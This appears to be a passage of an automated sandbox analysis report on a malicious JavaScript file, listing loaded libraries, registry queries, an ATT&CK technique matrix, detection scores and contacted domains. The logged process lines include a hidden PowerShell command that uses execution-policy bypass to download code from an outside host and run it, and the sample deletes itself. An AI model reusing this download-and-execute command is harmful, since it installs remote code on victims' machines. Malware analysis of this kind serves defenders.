Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1941799603.0000020E81AA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1941799603.0000020E81AA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1942615351.0000020E83931000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1962259728.0000020E9BD08000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:382 o:Windows%20Script%20Host f:CreateObject r:");IHost.ScriptFullName();IFileSystem3._00000000();ITextStream.WriteLine(" entry:389 o: f:DeleteFile a0:%22C%3A%5CUsers%5Cuser%5CDesktop%5C7hCWDvuinz.js%22");IFileSystem3.DeleteFile("C:\Users\user\Desktop\7hCWDvuinz.js")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA590A pushad ; ret 1_2_00007FFD9BAA5961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAA5952 pushad ; ret 1_2_00007FFD9BAA5961

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\7hcwdvuinz.jsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3544Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6312Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000002.1942615351.0000020E83931000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information32
Scripting
Valid Accounts1
Exploitation for Client Execution
32
Scripting
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
7hCWDvuinz.js16%ReversingLabsText.Malware.Boxter
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.19.228
truefalse
    high
    mbuzy3yvzw3r.top
    45.61.137.71
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://mbuzy3yvzw3r.top/1.php?s=mints13false
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://play.google.com/?hl=en&tab=w8powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
